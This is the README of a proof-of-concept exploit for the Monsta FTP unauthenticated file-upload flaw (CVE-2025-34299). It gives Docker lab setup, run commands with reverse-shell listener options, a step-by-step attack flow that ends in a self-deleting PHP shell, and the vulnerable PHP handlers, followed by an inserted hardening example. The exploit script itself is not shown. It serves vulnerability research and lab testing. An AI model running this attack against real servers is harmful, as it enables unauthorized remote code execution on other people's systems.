
POC details: 15f266044e31a6189d7fa9ed1376d65a18d3b39a

Source
Related vulnerability
Title: Monsta FTP security vulnerability (CVE-2025-34299)
Description: Monsta FTP is a lightweight file manager from the New Zealand company Monsta. It supports file transfer, file management and document editing. Monsta FTP 2.11 and earlier contain a security vulnerability that stems from allowing unauthenticated arbitrary file upload, which may lead to arbitrary code execution.
Description
MonstaFTP Unauthenticated File Upload
Introduction
# Monsta FTP CVE-2025-34299 Exploit

Python exploit for the RCE vulnerability in Monsta FTP (CVE-2025-34299).

## Description

This vulnerability allows arbitrary PHP code execution on the Monsta FTP server through the `downloadFile` functionality, which fetches a file from an attacker-controlled FTP or SFTP server and writes it to a user-controlled local path. The exploit establishes a reverse shell connection using pwntools.

**Note:** While the [watchTowr Labs research](https://labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/) demonstrates the vulnerability using SFTP, this exploit uses FTP, which works just as well (see Technical Details below).

## Prerequisites

- Python 3.x
- Docker and Docker Compose (optional)
- Network access to download Monsta FTP from archive.org

## Installation

Install Python dependencies:

```bash
pip install -r requirements.txt
```

## Usage

### Setting up the lab

The Dockerfile automatically downloads and installs Monsta FTP 2.10.4 from archive.org during the build process.

**Build and start the lab:**

```bash
cd lab
docker build -t monsta-ftp:2.10.4 .
docker run -d --name monsta-ftp-test -p 8080:80 monsta-ftp:2.10.4
```

**Alternative with Docker Compose:**

```bash
cd lab
docker-compose up -d
```

The lab will be available at `http://127.0.0.1:8080/mftp`.

**Verify the installation:**

```bash
curl http://127.0.0.1:8080/mftp/
```

You should see the Monsta FTP login page.

**Container management:**

- Stop the container: `docker stop monsta-ftp-test`
- Start the container: `docker start monsta-ftp-test`
- View logs: `docker logs monsta-ftp-test`
- Stop and remove the container: `docker rm -f monsta-ftp-test`
- Rebuild the image: `docker build -t monsta-ftp:2.10.4 .`

### Running the exploit

Once the lab is running, execute the exploit:

```bash
python3 exploit.py http://127.0.0.1:8080/mftp
```

**Options:**

- `--host`: FTP server host (default: 172.17.0.1)
- `--port`: FTP server port (default: 2121)
- `--lhost`: Listener host for reverse shell (default: 172.17.0.1)
- `--lport`: Listener port for reverse shell (default: 4444)

**Example with custom listener:**

```bash
python3 exploit.py http://127.0.0.1:8080/mftp \
  --lhost 172.17.0.1 \
  --lport 4444
```

**How it works:**

1. Starts a malicious FTP server with a reverse shell payload
2. Uploads the payload to Monsta FTP via the vulnerable `downloadFile` endpoint
3. Triggers the payload execution
4. Establishes an interactive reverse shell using pwntools

The payload automatically deletes itself after execution.

## Technical Details

### Why FTP Works Too

While the [watchTowr Labs research](https://labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/) demonstrates the vulnerability using SFTP, FTP works identically because both connection types use the same vulnerable pattern:

**SFTP Implementation** (`SFTPConnection.php`):
```php
protected function handleDownloadFile($transferOperation) {
    $remoteURL = $this->getRemoteFileURL($transferOperation->getRemotePath());
    if(@copy($remoteURL, $transferOperation->getLocalPath()))
        return true;
    // ...
}
```

**FTP Implementation** (`FTPConnection.php`):
```php
protected function handleDownloadFile($transferOperation) {
    return @ftp_get($this->connection,
                    $transferOperation->getLocalPath(),  // <-- User-controlled destination
                    $transferOperation->getRemotePath(),
                    $transferOperation->getTransferMode());
}
```

In both cases, `getLocalPath()` returns the user-controlled `localPath` parameter from the request context, allowing arbitrary file write to any location on the server's filesystem. The only difference is the PHP function used (`copy()` for SFTP vs `ftp_get()` for FTP), but both accept user-controlled destination paths without proper validation.
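As an added illustration of the fix this pattern needs (example code, not Monsta FTP's own patch), the hardened counterpart below resolves the requested `localPath` and refuses it unless it stays inside an allowed root before handing it to `ftp_get()`; `$allowedRoot`, `resolveWritablePath()` and `handleDownloadFileHardened()` are assumed names introduced for this example.

```php
<?php
// Added example, not the project's code. Containment check for the
// download destination: the destination must resolve to a path under
// $allowedRoot (an assumed configuration value), must not be a symlink,
// and must not carry an extension the web server would execute.
function resolveWritablePath(string $allowedRoot, string $requestedLocalPath): ?string {
    $root = realpath($allowedRoot);
    if ($root === false) {
        return null; // misconfigured root: fail closed rather than fall open
    }
    // realpath() only resolves existing paths, so resolve the parent
    // directory and re-attach the final component afterwards.
    $dir  = realpath(dirname($requestedLocalPath));
    $name = basename($requestedLocalPath);
    if ($dir === false || $name === '' || $name === '.' || $name === '..') {
        return null;
    }
    // The resolved parent must be the root itself or a descendant of it;
    // this is what "../" sequences and absolute paths in localPath fail.
    if ($dir !== $root && strpos($dir, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    $candidate = $dir . DIRECTORY_SEPARATOR . $name;
    if (is_link($candidate)) {
        return null; // the final component could still point outside the root
    }
    // Defence in depth: never let a fetched file land where PHP executes it.
    if (preg_match('/\.(php|phtml|phar)$/i', $name)) {
        return null;
    }
    return $candidate;
}

// Hardened form of the FTP handler shown above (hypothetical wrapper).
function handleDownloadFileHardened($connection, string $allowedRoot, $transferOperation): bool {
    $dest = resolveWritablePath($allowedRoot, $transferOperation->getLocalPath());
    if ($dest === null) {
        error_log('downloadFile: rejected localPath outside the allowed root');
        return false;
    }
    return @ftp_get($connection, $dest,
                    $transferOperation->getRemotePath(),
                    $transferOperation->getTransferMode());
}
```

The same `resolveWritablePath()` check applies unchanged to the SFTP handler, since `copy()` takes the identical user-controlled destination.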

## References

- [CVE-2025-34299](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-34299)
- [watchTowr Labs - Monsta FTP Remote Code Execution CVE-2025-34299](https://labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/) (Note: The research demonstrates SFTP, but FTP works as well)
File snapshot

```text
[4.0K] /data/pocs/15f266044e31a6189d7fa9ed1376d65a18d3b39a
├── [5.9K] exploit.py
├── [4.0K] lab
│   ├── [ 191] docker-compose.yml
│   └── [ 786] Dockerfile
├── [4.1K] README.md
└── [  51] requirements.txt

2 directories, 5 files
```